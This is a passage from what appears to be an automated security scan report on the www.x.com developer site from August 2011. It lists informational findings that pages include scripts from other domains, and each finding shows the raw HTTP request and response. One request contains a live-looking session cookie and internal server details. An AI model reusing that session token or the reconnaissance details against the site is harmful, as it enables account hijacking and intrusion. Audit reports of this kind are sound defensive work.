"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.159. https://www.x.com/docs/DOC-3811/restore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811/restore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3811/restore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=74141 t=1313157244704571
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.160. https://www.x.com/docs/DOC-3812  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3812

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3812 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333831323b3130322c313033313b3130322c313631333b3130322c313035313b3130322c313337323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=97831 t=1313157229433265
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.161. https://www.x.com/docs/DOC-3836  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3836

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3836 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333833363b3130322c323234313b3130322c333230313b3130322c313535313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b3130322c333335333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:05 GMT; Path=/
Vary: User-Agent
JP: D=194903 t=1313157245590892
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.162. https://www.x.com/docs/DOC-3841  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3841

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3841 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=198718 t=1313157228930468
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.163. https://www.x.com/docs/emailPasswordToken!input.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=14987 t=1313157244126484
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.164. https://www.x.com/emailPasswordToken!input.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=47387 t=1313157093849782
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.165. https://www.x.com/groups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /groups/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /groups/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=48364 t=1313157104111484
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.166. https://www.x.com/ideas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /ideas/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ideas/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=66606589 t=1313157225229043
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.167. https://www.x.com/index.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /index.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.jspa HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=81298 t=1313114364510678
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 33122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.168. https://www.x.com/main-apps.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /main-apps.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /main-apps.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=35573 t=1313157173580554
Cache-Control: no-cache, private
Connection: close
X-Pad: avoid browser bug

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.169. https://www.x.com/message/186684  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/186684

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/186684 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34363935333b312c35333838343b312c34393435343b312c35343036353b312c35333937373b312c34373636333b312c35343035383b312c35333135383b312c35333137323b312c35333235323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:40 GMT; Path=/
Vary: User-Agent
JP: D=137098 t=1313157519959178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.170. https://www.x.com/message/198017  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34393435343b312c35333937373b312c35343036353b312c35343035383b312c35333838343b312c34373636333b312c35333135383b312c35333137323b312c35333235323b312c35333331323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.171. https://www.x.com/message/211333  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211333

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/211333 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333135383b312c35333137323b312c35333235323b312c35333331393b312c35333331323b312c35333037353b312c35333334333b312c35333539323b312c35333437393b312c35333631303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=58458 t=1313157516498640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.172. https://www.x.com/message/211439  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211439

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/211439 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333137323b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=102902 t=1313157516178631
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.173. https://www.x.com/message/211738  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211738

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/211738 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b312c35333637393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105262 t=1313157515804148
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.174. https://www.x.com/message/212001  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212001

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212001 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333331323b312c35333334333b312c35333037353b312c35333331393b312c35333539323b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333632383b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105378 t=1313157515407297
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.175. https://www.x.com/message/212124  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212124

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212124 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333331393b312c35333334333b312c35333539323b312c35333037353b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333632383b312c35333636373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=62279 t=1313157514975703
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.176. https://www.x.com/message/212170  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212170

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212170 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333334333b312c35333539323b312c35333437393b312c35333037353b312c35333631303b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=97085 t=1313157514570063
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

